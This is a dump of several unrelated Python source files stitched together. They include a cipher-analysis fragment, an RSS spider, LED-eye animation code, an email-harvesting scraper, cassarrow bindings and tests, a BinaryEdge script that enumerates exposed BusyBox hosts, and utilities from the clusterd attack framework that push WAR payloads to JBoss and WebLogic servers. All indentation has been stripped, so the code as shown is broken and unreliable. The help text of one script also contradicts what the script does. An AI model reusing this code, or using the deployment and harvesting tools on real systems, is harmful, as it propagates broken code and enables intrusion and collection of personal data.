d.update({bi.keys()[0]:'th'})
d.update({bi.keys()[1]:'he'})
# Now compare against ETAOINSHRDLU
# Check whether we already have a mapping for elements from ETAOINSHRDLU and remove them
for k,v in d.items():
if v in ETAOINSHRDLU:
ETAOINSHRDLU.remove(v)
del single[k]
#Now map remnants of ETAOINSHRDLU to single most characters in single[] dict
for i in range(0,len(ETAOINSHRDLU)):
d.update({single.keys()[i]:ETAOINSHRDLU[i]})
#print "Mapping: " + single.keys()[i] + "-> " + ETAOINSHRDLU[i]
#At this point I'd like to have d ordered by the length of key
d=OrderedDict(sorted(d.items(), key=lambda x: -len(x[0])))
print d
for k,v in d.items():
print "Replacing " + k + " with " + v
data = data.replace(k,v)
print data
substHeu(s)
f.close()
``` |
{
"source": "0x24bin/oh-my-rss",
"score": 2
} |
#### File: spiders/day/ttalk_spider.py
```python
from feed.spiders.spider import Spider
class TtalkSpider(Spider):
name = 'ttalk'
def __init__(self):
Spider.__init__(self,
start_urls=[
'https://www.ttalk.im/',
],
index_xpath="//div[@class='text-left']/a/@href",
article_title_xpath="//h1/text()",
article_content_xpath="//div[contains(@class, 'content')]",
index_limit_count=3,
)
``` |
{
"source": "0x24elk/ScaryPi",
"score": 3
} |
#### File: 0x24elk/ScaryPi/scarypi.py
```python
import sys
import datetime
import random
import time
from PIL import Image
from luma.core import cmdline
from luma.core.interface.serial import spi, noop
from luma.core.render import canvas
from luma.core.virtual import viewport
class Point(object):
"""A point, because a tuple is soo yesterday."""
def __init__(self, x, y):
self.x = x
self.y = y
def __str__(self):
return "(%s, %s)" % (self.x, self.y)
class Animation(object):
"""Interface for an animation."""
def __init__(self):
"""Creates a new animation."""
self.start = None # The start time, once begun.
self.done = False
def begin(self, now):
"""Starts the animation at now milliseconds."""
self.start = now
def tick(self, now):
"""Performs a step of the animation based on the current time."""
class LinearAnimation(Animation):
"""Based class for linear animations."""
def __init__(self, duration_ms):
"""Creates a new animation of length duration_ms milliseconds."""
Animation.__init__(self)
self.duration_ms = duration_ms
def tick(self, now):
"""Performs a step of the animation based on the current time."""
Animation.tick(self, now)
dt_timedelta = (now - self.start)
dt = dt_timedelta.total_seconds() * 1000
if dt <= 0:
return # Bail if we're called too fast or going back in time.
if dt <= self.duration_ms:
self._animate(dt / self.duration_ms)
else:
self._animate(1.0)
self.done = True
def _animate(self, pct):
"""Overwrite in subclasses to performs a step, based on a percentage completion."""
class AnimationGroup(Animation):
"""Plays a group of Animations in parallel until all are done."""
def __init__(self, *args):
"""Initializes the animation with a list of animations."""
Animation.__init__(self)
self.animations = args
self.done = False
def begin(self, now):
Animation.begin(self, now)
for a in self.animations:
a.begin(now)
def tick(self, now):
Animation.tick(self, now)
all_done = True
for a in self.animations:
a.tick(now)
if not a.done:
all_done = False
self.done = all_done
class AnimationSequence(Animation):
"""Plays a set of Animations in sequence."""
def __init__(self, *args):
Animation.__init__(self)
self.animations = list(args)
self.active = None
def tick(self, now):
"""Advances the head animation in the queue, removing done ones."""
Animation.tick(self, now)
# End current animation, if done.
if self.active and self.active.done:
self.active = None
# Pop next animation from queue and start, if none.
if not self.active:
if self.animations:
self.active = self.animations.pop(0)
self.active.begin(now)
return
# No more animations => done.
if not self.active:
self.done = True
return
self.active.tick(now)
class Look(LinearAnimation):
"""An animation moving the pupil of an Eye."""
def __init__(self, eye, where, duration_ms=200):
"""Moves the eyeball to a given Point where."""
LinearAnimation.__init__(self, duration_ms)
self.eye = eye
self.origin = eye.pupil
self.dest = where
self.dx = self.dest.x - self.origin.x
self.dy = self.dest.y - self.origin.y
if self.dx == 0 and self.dy == 0:
self.done = True
def _animate(self, pct):
if self.done:
return
curr = Point(int(self.origin.x + (self.dx * pct)), int(self.origin.y + (self.dy * pct)))
self.eye._look(curr)
class Blink(LinearAnimation):
"""An animation blinking an Eye."""
def __init__(self, eye, duration_ms=500):
"""Blinks the eye in duration_ms"""
LinearAnimation.__init__(self, duration_ms)
self.eye = eye
self.eyelid = 0 # Offset of the eyelids, 0=open, 3=closed
def _animate(self, pct):
if self.done:
return
# Close eyelids 0->4 in first half of animation, then re-open.
if (pct < 0.5):
offset = 4 * (pct / 0.49) + 0.5
self.eye._eyelids(int(offset))
else:
offset = 4 - (4 * ((pct - 0.5) / 0.49) + 0.5)
self.eye._eyelids(int(offset))
# Ensure eyes fully open again at end of animation.
if pct >= 1.0:
self.eye._eyelids(-1)
return
class CrossEyes(AnimationSequence):
"""Crosses the eyes."""
def __init__(self, left, right, duration_ms=3000):
ms = duration_ms / 3
AnimationSequence.__init__(self,
AnimationGroup(left.look(Point(6, 4), ms), right.look(Point(2, 4), ms)),
Wait(ms),
AnimationGroup(left.look(Point(4, 4), ms), right.look(Point(4, 4), ms))
)
class MethEyes(AnimationSequence):
"""Inverse 'cross eyes', looking out."""
def __init__(self, left, right, duration_ms=3000):
ms = duration_ms / 3
AnimationSequence.__init__(self,
AnimationGroup(left.look(Point(2, 4), ms), right.look(Point(6, 4), ms)),
Wait(ms),
AnimationGroup(left.look(Point(4, 4), ms), right.look(Point(4, 4), ms))
)
class CrazyBlink(AnimationSequence):
"""Blinks left eye, then right."""
def __init__(self, left, right, duration_ms=1500):
ms = duration_ms / 2
AnimationSequence.__init__(self,
left.blink(ms),
right.blink(ms)
)
class LazyEye(AnimationSequence):
"""Lowers pupil of a single eye only."""
def __init__(self, eye, duration_ms=2000):
ms = duration_ms / 3
AnimationSequence.__init__(self,
eye.look(Point(4, 6), ms * 2), # Lower slowly
eye.look(Point(4, 4), ms), # Raise quickly
)
class CrazySpin(AnimationSequence):
"""'Spins' pupil horizontally with wraparound."""
def __init__(self, left, right, duration_ms=400):
times = 2
ms = duration_ms / (times*8)
a = []
# Just keep moving to the left, as the Eye class handles wrapping.
for i in range(0, times*8):
x = 4 - i
a.append(AnimationGroup(left.look(Point(x, 4), ms), right.look(Point(x, 4), ms)))
AnimationSequence.__init__(self, *a)
class RoundSpin(AnimationSequence):
"""Spins the eyeballs of both eyes in circles."""
def __init__(self, left, right, duration_ms=400):
times = 2
ms = duration_ms / (times*13 + 1)
a = [AnimationGroup(left.look(Point(6, 4), ms), right.look(Point(2, 4), ms))]
for i in range(times):
a = a + [
AnimationGroup(left.look(Point(6, 4), ms), right.look(Point(2, 4), ms)),
AnimationGroup(left.look(Point(6, 3), ms), right.look(Point(2, 3), ms)),
AnimationGroup(left.look(Point(5, 2), ms), right.look(Point(3, 2), ms)),
AnimationGroup(left.look(Point(4, 2), ms), right.look(Point(4, 2), ms)),
AnimationGroup(left.look(Point(3, 2), ms), right.look(Point(5, 2), ms)),
AnimationGroup(left.look(Point(2, 3), ms), right.look(Point(6, 3), ms)),
AnimationGroup(left.look(Point(2, 4), ms), right.look(Point(6, 4), ms)),
AnimationGroup(left.look(Point(2, 5), ms), right.look(Point(6, 5), ms)),
AnimationGroup(left.look(Point(3, 6), ms), right.look(Point(5, 6), ms)),
AnimationGroup(left.look(Point(4, 6), ms), right.look(Point(4, 6), ms)),
AnimationGroup(left.look(Point(5, 6), ms), right.look(Point(3, 6), ms)),
AnimationGroup(left.look(Point(6, 5), ms), right.look(Point(2, 5), ms)),
AnimationGroup(left.look(Point(6, 4), ms), right.look(Point(2, 4), ms))
]
AnimationSequence.__init__(self, *a)
class GlowEyes(LinearAnimation):
"""Glows the eyes; well, rather the device."""
def __init__(self, device, duration_ms=300):
"""Blinks the eye in duration_ms"""
LinearAnimation.__init__(self, duration_ms)
self.device = device
def _animate(self, pct):
if self.done:
return
# Increase contrast 30->150 in first half of animation, then bring down again.
if (pct < 0.5):
c = int(30 + 120 * (pct / 0.49))
self.device.contrast(c)
else:
c = int(150 - 120 * ((pct - 0.5) / 0.49))
self.device.contrast(c)
# Ensure eyes fully open again at end of animation.
if pct >= 1.0:
self.device.contrast(30)
class Wait(LinearAnimation):
"""An animation doing nothing."""
def __init__(self, eye, duration_ms=300):
"""Waits for duration_ms"""
LinearAnimation.__init__(self, duration_ms)
class Eye(object):
"""A single 8x8 eye we animate and draw on our LED matrix."""
# Basic eyeball template (without a pupil).
eye_ball = [
0b00111100,
0b01111110,
0b11111111,
0b11111111,
0b11111111,
0b11111111,
0b01111110,
0b00111100
]
def __init__(self):
"""Initializes the eye."""
self.pixels = bytearray(Eye.eye_ball)
# The center of the pupil, so 4,4 is looking straight ahead.
self.pupil = Point(4,4)
# The offset of the eyelid(s) from the top/bottom. < 0 for fully open.
self.eyelids = -1
def _on(self, x, y):
"""Flips the pixel at x,y on. Wraps if x/y out of bounds."""
y = y % 8
x = x % 8
self.pixels[y] = self.pixels[y] | (0b00000001 << (7 - x))
def _off(self, x, y):
"""Flips the pixel at x,y off. Wraps if x/y out of bounds."""
y = y % 8
x = x % 8
self.pixels[y] = self.pixels[y] & ~(0b00000001 << (7 - x))
def _row_on(self, y):
"""Flips the whole row at y on. Wraps if y out of bounds."""
y = y % len(self.pixels)
self.pixels[y] = 0b11111111
def _row_off(self, y):
"""Flips the whole row at y off. Wraps if y out of bounds."""
y = y % len(self.pixels)
self.pixels[y] = 0b00000000
def _look(self, pos):
"""Immediately moves the pupil of the eyeball to pos."""
self.pupil = pos
self.pupil.x = self.pupil.x % 8
self.pupil.y = self.pupil.y % 8
def _eyelids(self, offset):
"""Moves the eyelids to the given offset, -1=open, 3=closed."""
self.eyelids = max(-1, min(offset, 3))
def look(self, pos, duration_ms=300):
"""Returns an animation, moving the puil to pos in duration_ms."""
return Look(self, pos, duration_ms)
def blink(self, duration_ms=500):
"""Returns an animation, blinking the eye in duration_ms."""
return Blink(self, duration_ms)
def image(self):
"""Renders the current state of the eye into an 8x8 monochrome image."""
self.pixels = bytearray(Eye.eye_ball)
# Draw pupil
self._off(self.pupil.x-1,self.pupil.y-1)
self._off(self.pupil.x,self.pupil.y-1)
self._off(self.pupil.x-1,self.pupil.y)
self._off(self.pupil.x,self.pupil.y)
# Draw eyelids, if requested.
if self.eyelids >= 0:
for i in xrange(0, self.eyelids + 1):
self._row_off(i)
self._row_off(7-i)
return Image.frombytes('1', (8, 8), bytes(self.pixels))
def get_device(actual_args):
parser = cmdline.create_parser(description='luma.examples arguments')
args = parser.parse_args(actual_args)
if args.config:
# load config from file
config = cmdline.load_config(args.config)
args = parser.parse_args(config + actual_args)
# create device
device = cmdline.create_device(args)
return device
# General animation tick
TICK_SECONDS = 0.1
def render(left, right, device):
"""Renders the current state of the eyes on device."""
with canvas(device) as draw:
draw.bitmap((0, 0), left.image(), fill="white")
draw.bitmap((8, 0), right.image(), fill="white")
def pick_effect(device, left, right):
i = random.randint(0, 6)
if i == 0:
return CrossEyes(left, right)
if i == 1:
return CrazySpin(left, right)
if i == 2:
return MethEyes(left, right)
if i == 3:
return CrazyBlink(left, right)
if i == 4:
return LazyEye(left)
if i == 5:
return RoundSpin(left, right)
return GlowEyes(device)
def animation_loop(device):
left = Eye()
right = Eye()
main_sequence = AnimationSequence()
while(True):
start = datetime.datetime.now()
# Insert the next round of animations, if queue empty.
if main_sequence.done:
animations = []
# Look to a random point
p = Point(random.randint(2,5), random.randint(2,5))
animations.append(
AnimationGroup(left.look(p), right.look(p)))
# Wait 2.5 - 3.5s
animations.append(Wait(random.randint(5,7) * 500))
# Maybe blink
if random.randint(0, 3) == 0:
animations.append(
AnimationGroup(left.blink(), right.blink()))
# Play an effect, if desired.
if random.randint(0, 6) == 0:
animations.append(pick_effect(device, left, right))
main_sequence = AnimationSequence(*animations)
# Animate
main_sequence.tick(start)
render(left, right, device)
# Sleep if we're going too fast.
elapsed = datetime.datetime.now() - start
sleeptime = max(TICK_SECONDS - elapsed.total_seconds(), 0)
time.sleep(sleeptime)
def main():
device = get_device(sys.argv[1:])
device.contrast(30)
animation_loop(device)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
pass
``` |
{
"source": "0x25/scrabe",
"score": 3
} |
#### File: 0x25/scrabe/scrabe.py
```python
import argparse
from multiprocessing import Pool
import requests
from bs4 import BeautifulSoup
import urllib.parse as urlparse
import os, sys, re
import socket
import validators
import time, random
def load_file(file):
''' read file line by line and output a list'''
if os.path.isfile(file):
with open(file) as f:
lines = f.read().splitlines()
return lines
else:
print(f"\033[0;31mERROR: file not exist [{file}]\033[0m")
sys.exit(1)
def check_url_format(url):
''' valide or reformat URL format. URL must start with http(s)'''
if url.find('http') != 0:
url = 'http://' + url
if validators.url(url) is True:
return url
else:
return False
def scrape_urls(site, blacklist, max_depth = 1, cur_depth=0, urls=[],emails=[]):
''' recursive function to grep url from url'''
pid = os.getpid()
url = urlparse.urlparse(site)
status_code = None
base_url = url.scheme + '://' + url.netloc
if url.path != '':
base_url = base_url + os.path.dirname(url.path) + '/' # do // sometime
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
try:
r = requests.get(site, headers=headers)
status_code = r.status_code
except:
print(f" WARNING: [{pid}] request fail {site}")
return {'urls': urls, 'emails': emails} # maybe ...
print(f" INFO: [{pid}] HTTP status code [{status_code}]")
s = BeautifulSoup(r.text,"html.parser")
mails = scrap_email(r.text)
for mail in mails:
if mail not in emails:
emails.append(mail)
nb_emails = len(emails)
print(f" Info: pid[{pid}] depth[{cur_depth}] emails[{nb_emails}] {site}")
if cur_depth >= max_depth: # exit: to mutch iterration
print(f" INFO: pid[{pid}] max depth {cur_depth} {max_depth}")
return {'urls': urls, 'emails': emails}
for a in s.find_all("a", href=True):
site = format_url(a['href'],base_url)
if site is not False:
if site not in urls and check_extension(site, blacklist):
urls.append(site)
time.sleep(random.randint(1,4)/5) # no dos
scrape_urls(site, blacklist, max_depth, cur_depth+1, urls, emails)
return {'urls': urls, 'emails': emails}
def format_url(url_tmp,url_valide):
''' create Url and check if in domain. need http predix for url_valide'''
url_temp_raw = url_tmp
url_valide_raw = url_valide
url_tmp = urlparse.urlparse(url_tmp)
url_valide = urlparse.urlparse(url_valide)
if url_tmp.netloc == '' or url_tmp.netloc == url_valide.netloc:
if url_tmp.path != '' and url_tmp.path.find('(') == -1 and url_tmp.scheme != 'mailto':
url_join = urlparse.urljoin(url_valide_raw, url_temp_raw)
return url_join
return False
def check_redirection(url, max_redirection=5):
''' check if url is redirect and return value'''
count = 0
while count < max_redirection:
count = count + 1
try:
req = requests.head(url, timeout=(2, 5), allow_redirects=False)
except:
print("\033[0;31mWARNING: check_redirection error (SSL/Timeout ...)\033[0m")
return False
if 'location' in req.headers:
url = req.headers['location']
if count == max_redirection:
print("\033[0;31mWARNING: To mutch redirection\033[0m")
return False
else:
break
return url
def valid_domain(url):
''' ns lookup to resolv domain to IP'''
url = urlparse.urlparse(url)
domain = url.netloc
try:
s = socket.getaddrinfo(domain,0,2,0,0)
return True
except:
print("\033[0;31mWARNING: domain resolution fail\033[0m")
return False
def scrap_email(txt):
''' scrap mail on txt'''
out = re.findall(r"\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.(?!png|jpg|gif)[A-Z|a-z]{2,}\b", txt, re.I)
return out
def write_to(file,values):
''' Write list to file line by line'''
if isinstance(values, list):
try:
f = open(file, "w")
for value in values:
f.write(f"{value}\n")
f.close()
return True
except:
print("\033[0;31mWARNING: Fail to write file\033[0m")
return False
else:
print('\033[0;31mWARNING: Need a list, wrong type\033[0m')
return False
def check_extension(url,blacklist=[]):
''' check if extension is in blacklist. need http prefix'''
path = urlparse.urlparse(url).path
if os.path.splitext(path)[1]:
if os.path.splitext(path)[1] in blacklist:
return False
else:
return True
else:
return True # no extension
def scrap(datas):
''' scrap url '''
pid = os.getpid()
url = datas['url']
folder = datas['out']
blacklist = datas['blacklist']
max_depth = datas['max_depth']
print(f"\033[0;32mINFO [{pid}] Start {url}\033[0m")
check_url = check_url_format(url)
if check_url is False:
print(f"\033[0;31mWARNING: [{pid}] invalid URL [{url}]\033[0m")
else:
if valid_domain(check_url):
rurl = check_redirection(check_url)
if rurl is not False:
if check_url not in rurl:
print(f"\033[0;32mINFO [{pid}] reddirection {check_url} > {rurl}\033[0m")
else:
print(f"\033[0;32mINFO [{pid}] Scrap {rurl}\033[0m")
file = urlparse.urlparse(rurl).hostname + '.txt'
path = os.path.join(folder,file)
if os.path.isfile(path) is False:
#scrap Url
result = scrape_urls(rurl,blacklist,max_depth,0,[],[])
mails = result['emails']
# write emails in file
write_to(path,mails)
else:
print(f"\033[0;32mINFO [{pid}] File already exist {path}")
else:
print(f"\033[0;31mWARNING: [{pid}] request error {check_url}\033[0m")
else:
print(f"\033[0;31mWARNING: [{pid}] name resolution error {check_url}\033[0m")
print(f'\033[0;32mINFO: [{pid}] END {check_url}\033[0m')
def main():
""" main code """
threads = 4
file = 'scrabe.txt'
folder = 'out'
blacklist = ['.pdf','.xls','.xlsx','.pptx','.doc','.docx','.docm','.jpg','.jpeg','.png','.gif','.tiff']
max_depth = 1
description = 'Scrap email from URLs'
parser = argparse.ArgumentParser(description=description)
parser.add_argument('-t','--threads', type=int, default=threads, help='number of default concurent threads')
parser.add_argument('-f','--file', default=file, help='file with a URL line by line. Best to prefix URL with http/https (default scrabe.txt)')
parser.add_argument('-o','--out', default=folder, help='folder to save output (default /out')
parser.add_argument('-m','--max', default=max_depth, help='set recurisve depth (default 1')
args = parser.parse_args()
threads = args.threads
file = args.file
folder = args.out
max_depth = int(args.max)
urls = load_file(file)
print(f"\033[0;32mINFO: Load {len(urls)} from {file}\033[0m")
print(f"\033[0;32mINFO: Extension blacklist: {blacklist}\033[0m")
if not os.path.exists(folder):
os.mkdir(folder)
# deduplicate
urls = list(set(urls))
jobs = []
for url in urls:
jobs.append({'out':folder, 'url':url, 'blacklist': blacklist, 'max_depth': max_depth})
p = Pool(threads)
p.map(scrap,jobs)
p.close()
p.join()
# main
if __name__ == '__main__':
main()
``` |
{
"source": "0x26res/cassarrow",
"score": 2
} |
#### File: cassarrow/scripts/dump_test_data.py
```python
import pathlib
import cassandra
import cassandra.cluster
from cassandra.protocol import _ProtocolHandler
SELECT_QUERIES = {
"time_series": (
"SELECT * FROM cassarrow.time_series WHERE event_date = '2019-10-02'"
),
"simple_primitives": "SELECT * FROM cassarrow.simple_primitives",
"simple_map": "SELECT * FROM cassarrow.simple_map",
}
def create_dump_select_protocol_handler(destination: pathlib.Path):
class DumpProtocolHandler(_ProtocolHandler):
@classmethod
def decode_message(
cls,
protocol_version,
user_type_map,
stream_id,
flags,
opcode,
body,
decompressor,
result_metadata,
):
stream_destination = destination / f"{stream_id:04}.bin"
with stream_destination.open("wb") as fp:
fp.write(body)
print(f"Saved {len(body)} to {stream_destination}")
return super().decode_message(
protocol_version,
user_type_map,
stream_id,
flags,
opcode,
body,
decompressor,
result_metadata,
)
return DumpProtocolHandler
def dump_select_query(destination: pathlib.Path, query: str):
cluster = cassandra.cluster.Cluster()
with cluster.connect("cassarrow") as connection:
assert query.startswith("SELECT *")
json_query = query.replace("SELECT *", "SELECT JSON *")
json = connection.execute(json_query)
with (destination / "all.jsonl" "").open("w") as fp:
for payload in json:
fp.write(payload.json)
fp.write("\n")
connection.client_protocol_handler = create_dump_select_protocol_handler(
destination
)
results = connection.execute(query)
print(destination, len(list(results)))
def dump_all():
for destination, query in SELECT_QUERIES.items():
actual_destination = pathlib.Path("tests/select") / destination
actual_destination.mkdir(parents=True, exist_ok=True)
dump_select_query(actual_destination, query)
if __name__ == "__main__":
dump_all()
```
#### File: 0x26res/cassarrow/setup.py
```python
import os
import pathlib
import pyarrow
from pybind11.setup_helpers import Pybind11Extension, build_ext
from setuptools import setup
__version__ = "0.1.2"
ROOT = pathlib.Path(__file__).parent
README = (ROOT / "README.md").read_text()
USE_CXX11_ABI = os.environ.get("USE_CXX11_ABI", "0")
def get_extension():
pyarrow.create_library_symlinks()
source_directory = ROOT / "cpp" / "src"
extension = Pybind11Extension(
name="_cassarrow",
sources=[
str(source_directory / "cassarrow/bindings.cpp"),
str(source_directory / "cassarrow/cassarrow.cpp"),
],
define_macros=[("VERSION_INFO", __version__)],
cxx_std=11,
)
if USE_CXX11_ABI is not None:
extension.extra_compile_args.append(f"-D_GLIBCXX_USE_CXX11_ABI={USE_CXX11_ABI}")
extension.extra_compile_args.append(f"-I{source_directory}")
extension.extra_compile_args.append(f"-I{pyarrow.get_include()}")
for library_dir in pyarrow.get_library_dirs():
extension.extra_link_args.append(f"-L{library_dir}")
for library in pyarrow.get_libraries():
extension.extra_link_args.append(f"-l{library}")
return extension
ext_modules = [get_extension()]
setup(
name="cassarrow",
description="Apache Arrow adapter for the Cassandra python driver",
long_description=README,
long_description_content_type="text/markdown",
url="https://github.com/0x26res/cassarrow",
author="0x26res",
author_email="<EMAIL>",
version=__version__,
classifiers=[
"License :: OSI Approved :: Apache Software License",
"Development Status :: 4 - Beta",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: C++",
"Topic :: Software Development :: Libraries :: Python Modules",
"Natural Language :: English",
],
packages=["cassarrow"],
ext_modules=ext_modules,
package_dir={"": "./"},
install_requires=[
"setuptools>=42",
"wheel",
"pybind11>=2.9.0",
"pyarrow>=7.0.0",
"cassandra-driver",
],
extras_require={"test": ["pytest", "pandas", "tabulate"]},
cmdclass={"build_ext": build_ext},
zip_safe=False,
python_requires=">=3.9",
)
```
#### File: cassarrow/tests/fixtures.py
```python
import typing
import cassandra.cluster
import pytest
import cassarrow
@pytest.fixture()
def cluster() -> cassandra.cluster.Cluster:
return cassandra.cluster.Cluster()
@pytest.fixture()
def session(
cluster: cassandra.cluster.Cluster,
) -> typing.Iterator[cassandra.cluster.Session]:
with cluster.connect("cassarrow") as s:
yield s
@pytest.fixture()
def cassarrow_session(
session: cassandra.cluster.Session,
) -> typing.Iterator[cassandra.cluster.Session]:
with cassarrow.install_cassarrow(session) as s:
yield s
``` |
{
"source": "0x27/be-utils",
"score": 3
} |
#### File: 0x27/be-utils/example_page_iter.py
```python
from pybinaryedge import BinaryEdge
import argparse
import math
import sys
API_KEY = ""
def iter_example(limit=None, count=False):
# ok, we need to do some more advanced science here to iterate over page=?
be = BinaryEdge(API_KEY)
search = 'product:"BUSYBOX" country:"IT"'
results = be.host_search(search)
pages_needed = math.ceil(results['total']/20.0) # hack to round UP the pages num, avoid missing shit
if count == True:
print "Results: %d" %(results['total'])
print "Will need to get %d pages..." %(pages_needed)
return
# now we need a query loop. this is horrible.
if limit != None:
pages_needed = limit # add limiting...
if pages_needed > 500:
pages_needed = 500 # sanity check for API limits!
page = 1
while page <= pages_needed:
results = be.host_search(search, page=page)
page+=1
for ip in results['events']:
print "%s:%s" %(ip['target']['ip'], ip['target']['port'])
def main():
parser = argparse.ArgumentParser(description='Finds open Tor SOCKS proxies')
parser.add_argument('-c', action='store_true', help='Count results instead of printing some IPs')
parser.add_argument('-l', type=int, help='Page limit, for saving credits!')
args = parser.parse_args()
if args.c:
iter_example(limit=None ,count=True)
else:
# we run with it...
if args.l: # hope you limited it!
iter_example(limit=args.l, count=False)
else: # danger will robinson!
iter_example(limit=None, count=False)
if __name__ == "__main__":
main()
``` |
{
"source": "0x27/clusterd",
"score": 3
} |
#### File: src/core/auxiliary.py
```python
class Auxiliary(object):
def __init__(self):
self.name = None # name of the module
self.versions = [] # supported versions
self.flag = None # CLI flag
def check(self, fingerprint):
""" Given the fingerprint of a remote service, check whether this
module is relevant.
True for valid, False for not
"""
raise NotImplementedError
def run(self, fingerengine, fingerprint):
""" Initiates the module
"""
raise NotImplementedError
```
#### File: src/module/deploy_utils.py
```python
from src.platform.weblogic.interfaces import WINTERFACES
from time import sleep
from subprocess import Popen, PIPE, check_output,STDOUT
from requests import get
from signal import SIGINT
from os import kill, system
from sys import stdout
from log import LOG
import importlib
import pkgutil
import state
import utility
def _serve(war_file = None):
""" Launch a SimpleHTTPServer listener to serve up our WAR file
to the requesting host. This is used primarily to serve a WAR
to JBoss' jmx_deployer.
If war_file is provided, this will make a copy of this file into
our temp dir and remove it once its been completed.
"""
try:
if war_file:
system("cp %s %s 2>/dev/null" % (war_file, state.serve_dir))
proc = Popen(["python", "-m", "SimpleHTTPServer", str(state.external_port)],
stdout=PIPE, stderr=PIPE, cwd=state.serve_dir)
while 'GET' not in proc.stderr.readline():
sleep(1.0)
# this might be too short for huge files
sleep(3.0)
except Exception, e:
utility.Msg(e, LOG.DEBUG)
finally:
kill(proc.pid, SIGINT)
if war_file:
war_name = war_file.rsplit('/', 1)[1]
# remove our copied file
system("rm -f %s/%s" % (war_name, state.serve_dir))
def waitServe(servert):
""" Small function used to wait for a _serve thread to receive
a GET request. See _serve for more information.
servert should be a running thread.
"""
timeout = 10
status = False
try:
while servert.is_alive() and timeout > 0:
stdout.flush()
stdout.write("\r\033[32m [%s] Waiting for remote server to "
"download file [%ds]" % (utility.timestamp(), timeout))
sleep(1.0)
timeout -= 1
except:
timeout = 0
if timeout is not 10:
print ''
if timeout is 0:
utility.Msg("Remote server failed to retrieve file.", LOG.ERROR)
else:
status = True
return status
def wc_invoke(url, local_url, usr = None, pswd = None):
""" Invoke the webconsole deployer
"""
res = None
try:
res = check_output(["./webc_deploy.sh", url, local_url, str(usr),
str(pswd)],
cwd="./src/lib/jboss/webconsole_deploy")
except Exception, e:
utility.Msg(e, LOG.DEBUG)
res = e
return res
def invkdeploy(version, url, local_url, random_int):
"""
"""
res = None
creds = None
if state.usr_auth != None:
creds = state.usr_auth.split(':')
try:
if creds != None:
res = check_output(["./invkdeploy.sh", version, url,
local_url, str(random_int),creds[0],creds[1]],
cwd="./src/lib/jboss/jmxinvoke_deploy",stderr=STDOUT)
else:
res = check_output(["./invkdeploy.sh", version, url,
local_url, str(random_int)],
cwd="./src/lib/jboss/jmxinvoke_deploy",stderr=STDOUT)
except Exception, e:
utility.Msg(e, LOG.DEBUG)
res = str(e)
return res
def bsh_deploy(arch, url, version, usr = None, pswd = None):
""" Invoke the BSHDeployer
"""
res = None
try:
res = check_output(["./bshdeploy.sh", url, arch, version,
str(usr), str(pswd)],
cwd="./src/lib/jboss/bsh_deploy")
except Exception, e:
utility.Msg(e, LOG.DEBUG)
res = e
return res
def deploy_list(usr_platform = None):
""" Simple function for dumping all deployers for supported
platforms. This lists them in the format INTERFACE (name), where
name is used for matching.
"""
for platform in state.supported_platforms:
# check for a specified platform
if usr_platform != 'All' and usr_platform != platform:
continue
utility.Msg("Deployers for '%s'" % platform, LOG.UPDATE)
load = importlib.import_module('src.platform.%s.deployers' % platform)
# load all deployers
modules = list(pkgutil.iter_modules(load.__path__))
if len(modules) <= 0:
utility.Msg("\tNo deployers found.")
continue
for deployer in modules:
try:
dp = deployer[0].find_module(deployer[1]).load_module(deployer[1])
if 'Any' in dp.versions: dp.versions.remove("Any") # used for FP only
utility.Msg("\t%s (%s [%s])" % (dp.title, deployer[1],
'|'.join(dp.versions)))
except Exception, e:
utility.Msg(e, LOG.DEBUG)
continue
def auxiliary_list(usr_platform = None):
""" Lists all platform auxiliary modules
"""
for platform in state.supported_platforms:
# if they've specified a specific platform, check for it
if usr_platform != 'All' and usr_platform != platform:
continue
utility.Msg("Auxiliary modules for '%s'" % platform, LOG.UPDATE)
load = importlib.import_module('src.platform.%s.auxiliary' % platform)
modules = list(pkgutil.iter_modules(load.__path__))
if len(modules) <= 0:
utility.Msg("\tNo auxiliarys found.")
continue
for auxiliary in modules:
try:
aux = auxiliary[0].find_module(auxiliary[1]).load_module(auxiliary[1]).Auxiliary()
except:
utility.Msg("Could not load auxiliary module '%s'" %
auxiliary[1], LOG.DEBUG)
utility.Msg("\t%s ([%s] --%s)" % (aux.name,
'|'.join(aux.versions), aux.flag))
def parse_war_path(war, include_war = False):
""" Parse off the raw WAR name for setting its context
"""
if '/' in war:
war = war.rsplit('/', 1)[1]
if include_war:
return war
else:
return war.split('.')[0]
def killServe():
""" In the event that our local server does not get
invoked, we need to kill it tenderly
"""
try:
get("http://localhost:%s" % state.external_port, timeout=1.0)
except:
pass
```
#### File: src/module/discovery.py
```python
from log import LOG
from os.path import abspath
from fingerprint import FingerEngine
import utility
import re
import pkgutil
import state
def detectFileType(inFile):
#Check to see if file is of type gnmap
firstLine = inFile.readline()
secondLine = inFile.readline()
thirdLine = inFile.readline()
#Be polite and reset the file pointer
inFile.seek(0)
if (firstLine.find('nmap') != -1 and thirdLine.find('Host:') != -1):
#Looks like a gnmap file - this wont be true for other nmap output types
#Check to see if -sV flag was used, if not, warn
if(firstLine.find('-sV') != -1 or firstLine.find('-A') != -1 or firstLine.find('-sSV') != -1):
return 'gnmap'
else:
utility.Msg("Nmap version detection not used! Discovery module may miss some hosts!", LOG.INFO)
return 'gnmap'
else:
return None
'''
Parse a gnmap file into a dictionary. The dictionary key is the ip address or hostname.
Each key item is a list of ports and whether or not that port is https/ssl. For example:
>>> targets
{'127.0.0.1': [[443, True], [8080, False]]}
'''
def parseGnmap(inFile):
targets = {}
for hostLine in inFile:
currentTarget = []
#Pull out the IP address (or hostnames) and HTTP service ports
fields = hostLine.split(' ')
ip = fields[1] #not going to regex match this with ip address b/c could be a hostname
for item in fields:
#Make sure we have an open port with an http type service on it
if item.find('http') != -1 and re.findall('\d+/open',item):
port = None
https = False
'''
nmap has a bunch of ways to list HTTP like services, for example:
8089/open/tcp//ssl|http
8000/closed/tcp//http-alt///
8008/closed/tcp//http///
8080/closed/tcp//http-proxy//
443/open/tcp//ssl|https?///
8089/open/tcp//ssl|http
Since we want to detect them all, let's just match on the word http
and make special cases for things containing https and ssl when we
construct the URLs.
'''
port = item.split('/')[0]
if item.find('https') != -1 or item.find('ssl') != -1:
https = True
#Add the current service item to the currentTarget list for this host
currentTarget.append([port,https])
if(len(currentTarget) > 0):
targets[ip] = currentTarget
return targets
def doFingerprint(host, port, ssl, service):
